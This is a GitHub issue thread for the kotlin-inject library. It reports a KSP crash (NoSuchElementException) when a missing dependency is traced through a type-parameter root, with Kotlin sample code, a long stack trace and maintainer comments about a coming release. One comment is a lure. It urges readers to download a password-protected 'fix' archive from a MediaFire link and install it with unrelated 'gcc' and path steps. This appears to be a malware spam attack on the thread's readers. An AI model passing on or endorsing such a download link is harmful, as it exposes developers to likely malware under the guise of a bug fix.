### ISSUE TITLE
NoSuchElementException when tracing a missing dependency and the root is a type parameter

### ISSUE THREAD

**Issue by eygraber** [evant/kotlin-inject#426]
```kotlin
class Foo
                
@Inject class Bar(val foo: Foo)
                
interface DestinationComponent<C> {
  val c: C
}
                
@Inject class CType(val bar: Bar)
                
@Component
abstract class FooBarComponent : DestinationComponent<CType>
```

```
[ksp] java.util.NoSuchElementException: No TypeParameter found for index C
	at com.squareup.kotlinpoet.ksp.TypeParameterResolver$Companion$EMPTY$1.get(TypeParameterResolver.kt:45)
	at com.squareup.kotlinpoet.ksp.KsTypesKt.toTypeName(KsTypes.kt:71)
	at com.squareup.kotlinpoet.ksp.KsTypesKt.toTypeName(KsTypes.kt:194)
	at com.squareup.kotlinpoet.ksp.KsTypesKt.toTypeName$default(KsTypes.kt:182)
	at me.tatarka.kotlin.ast.KSAstType.toString(KSAst.kt:535)
	at java.base/java.lang.String.valueOf(String.java:4507)
	at java.base/java.lang.StringBuilder.append(StringBuilder.java:173)
	at me.tatarka.kotlin.ast.AstProperty.toString(Ast.kt:184)
	at me.tatarka.kotlin.ast.KSAstProvider.toTrace(KSAst.kt:90)
	at me.tatarka.inject.compiler.CycleDetector.trace$lambda$4(CycleDetector.kt:69)
	at kotlin.text.StringsKt__AppendableKt.appendElement(Appendable.kt:84)
	at kotlin.collections.CollectionsKt___CollectionsKt.joinTo(_Collections.kt:3493)
	at kotlin.collections.CollectionsKt___CollectionsKt.joinToString(_Collections.kt:3510)
	at kotlin.collections.CollectionsKt___CollectionsKt.joinToString$default(_Collections.kt:3509)
	at me.tatarka.inject.compiler.CycleDetector.trace(CycleDetector.kt:69)
	at me.tatarka.inject.compiler.TypeResultResolver.trace(TypeResultResolver.kt:586)
	at me.tatarka.inject.compiler.TypeResultResolver.cannotFind(TypeResultResolver.kt:588)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveParamsLegacy(TypeResultResolver.kt:177)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveParams(TypeResultResolver.kt:71)
	at me.tatarka.inject.compiler.TypeResultResolver.Constructor$lambda$23(TypeResultResolver.kt:477)
	at me.tatarka.inject.compiler.TypeResultResolver.withCycleDetection$lambda$30(TypeResultResolver.kt:564)
	at me.tatarka.inject.compiler.CycleDetector.check(CycleDetector.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.withCycleDetection(TypeResultResolver.kt:562)
	at me.tatarka.inject.compiler.TypeResultResolver.Constructor(TypeResultResolver.kt:472)
	at me.tatarka.inject.compiler.TypeResultResolver.constructor(TypeResultResolver.kt:393)
	at me.tatarka.inject.compiler.TypeResultResolver.findType(TypeResultResolver.kt:249)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveOrNull(TypeResultResolver.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.resolve(TypeResultResolver.kt:40)
	at me.tatarka.inject.compiler.TypeResultResolver.Scoped(TypeResultResolver.kt:463)
	at me.tatarka.inject.compiler.TypeResultResolver.constructor(TypeResultResolver.kt:385)
	at me.tatarka.inject.compiler.TypeResultResolver.findType(TypeResultResolver.kt:249)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveOrNull(TypeResultResolver.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.resolve(TypeResultResolver.kt:40)
	at me.tatarka.inject.compiler.TypeResultResolver.Provides$lambda$21(TypeResultResolver.kt:444)
	at me.tatarka.inject.compiler.TypeResultResolver.withCycleDetection$lambda$30(TypeResultResolver.kt:564)
	at me.tatarka.inject.compiler.CycleDetector.check(CycleDetector.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.withCycleDetection(TypeResultResolver.kt:562)
	at me.tatarka.inject.compiler.TypeResultResolver.Provides(TypeResultResolver.kt:437)
	at me.tatarka.inject.compiler.TypeResultResolver.method(TypeResultResolver.kt:269)
	at me.tatarka.inject.compiler.TypeResultResolver.findType(TypeResultResolver.kt:224)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveOrNull(TypeResultResolver.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveParamsNew(TypeResultResolver.kt:114)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveParams(TypeResultResolver.kt:69)
	at me.tatarka.inject.compiler.TypeResultResolver.Constructor$lambda$23(TypeResultResolver.kt:477)
	at me.tatarka.inject.compiler.TypeResultResolver.withCycleDetection$lambda$30(TypeResultResolver.kt:564)
	at me.tatarka.inject.compiler.CycleDetector.check(CycleDetector.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.withCycleDetection(TypeResultResolver.kt:562)
	at me.tatarka.inject.compiler.TypeResultResolver.Constructor(TypeResultResolver.kt:472)
	at me.tatarka.inject.compiler.TypeResultResolver.constructor(TypeResultResolver.kt:393)
	at me.tatarka.inject.compiler.TypeResultResolver.findType(TypeResultResolver.kt:249)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveOrNull(TypeResultResolver.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.functionType(TypeResultResolver.kt:358)
	at me.tatarka.inject.compiler.TypeResultResolver.findType(TypeResultResolver.kt:236)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveOrNull(TypeResultResolver.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveParamsLegacy(TypeResultResolver.kt:173)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveParams(TypeResultResolver.kt:71)
	at me.tatarka.inject.compiler.TypeResultResolver.Constructor$lambda$23(TypeResultResolver.kt:477)
	at me.tatarka.inject.compiler.TypeResultResolver.withCycleDetection$lambda$30(TypeResultResolver.kt:564)
	at me.tatarka.inject.compiler.CycleDetector.check(CycleDetector.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.withCycleDetection(TypeResultResolver.kt:562)
	at me.tatarka.inject.compiler.TypeResultResolver.Constructor(TypeResultResolver.kt:472)
	at me.tatarka.inject.compiler.TypeResultResolver.constructor(TypeResultResolver.kt:393)
	at me.tatarka.inject.compiler.TypeResultResolver.findType(TypeResultResolver.kt:249)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveOrNull(TypeResultResolver.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.resolve(TypeResultResolver.kt:40)
	at me.tatarka.inject.compiler.TypeResultResolver.Scoped(TypeResultResolver.kt:463)
	at me.tatarka.inject.compiler.TypeResultResolver.constructor(TypeResultResolver.kt:385)
	at me.tatarka.inject.compiler.TypeResultResolver.findType(TypeResultResolver.kt:249)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveOrNull(TypeResultResolver.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveParamsLegacy(TypeResultResolver.kt:173)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveParams(TypeResultResolver.kt:71)
	at me.tatarka.inject.compiler.TypeResultResolver.Constructor$lambda$23(TypeResultResolver.kt:477)
	at me.tatarka.inject.compiler.TypeResultResolver.withCycleDetection$lambda$30(TypeResultResolver.kt:564)
	at me.tatarka.inject.compiler.CycleDetector.check(CycleDetector.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.withCycleDetection(TypeResultResolver.kt:562)
	at me.tatarka.inject.compiler.TypeResultResolver.Constructor(TypeResultResolver.kt:472)
	at me.tatarka.inject.compiler.TypeResultResolver.constructor(TypeResultResolver.kt:393)
	at me.tatarka.inject.compiler.TypeResultResolver.findType(TypeResultResolver.kt:249)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveOrNull(TypeResultResolver.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.resolve(TypeResultResolver.kt:40)
	at me.tatarka.inject.compiler.TypeResultResolver.Scoped(TypeResultResolver.kt:463)
	at me.tatarka.inject.compiler.TypeResultResolver.constructor(TypeResultResolver.kt:385)
	at me.tatarka.inject.compiler.TypeResultResolver.findType(TypeResultResolver.kt:249)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveOrNull(TypeResultResolver.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.resolve(TypeResultResolver.kt:40)
	at me.tatarka.inject.compiler.TypeResultResolver.Provider$lambda$18(TypeResultResolver.kt:412)
	at me.tatarka.inject.compiler.TypeResultResolver.withCycleDetection$lambda$30(TypeResultResolver.kt:564)
	at me.tatarka.inject.compiler.CycleDetector.check(CycleDetector.kt:50)
	at me.tatarka.inject.compiler.TypeResultResolver.withCycleDetection(TypeResultResolver.kt:562)
	at me.tatarka.inject.compiler.TypeResultResolver.Provider(TypeResultResolver.kt:411)
	at me.tatarka.inject.compiler.TypeResultResolver.resolveAll(TypeResultResolver.kt:31)
	at me.tatarka.inject.compiler.InjectGenerator.generateInjectComponent(InjectGenerator.kt:153)
	at me.tatarka.inject.compiler.InjectGenerator.generate(InjectGenerator.kt:68)
	at me.tatarka.inject.compiler.ksp.ProcessInjectKt.process(ProcessInject.kt:78)
	at me.tatarka.inject.compiler.ksp.ProcessInjectKt.processInject(ProcessInject.kt:28)
	at me.tatarka.inject.compiler.ksp.ProcessInjectKt.processInject$default(ProcessInject.kt:19)
	at me.tatarka.inject.compiler.ksp.InjectProcessor.process$lambda$1(InjectProcessor.kt:55)
	at kotlin.sequences.FilteringSequence$iterator$1.calcNext(Sequences.kt:171)
	at kotlin.sequences.FilteringSequence$iterator$1.hasNext(Sequences.kt:194)
	at kotlin.sequences.SequencesKt___SequencesKt.toList(_Sequences.kt:813)
	at me.tatarka.inject.compiler.ksp.InjectProcessor.process(InjectProcessor.kt:57)
```

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by eygraber** [comment]
@evant any plans for cutting a 0.7.2 build? If not, can there be :sweat_smile:

**Comment by evant** [comment]
Working through some known bugs, a release is planned soonish after that
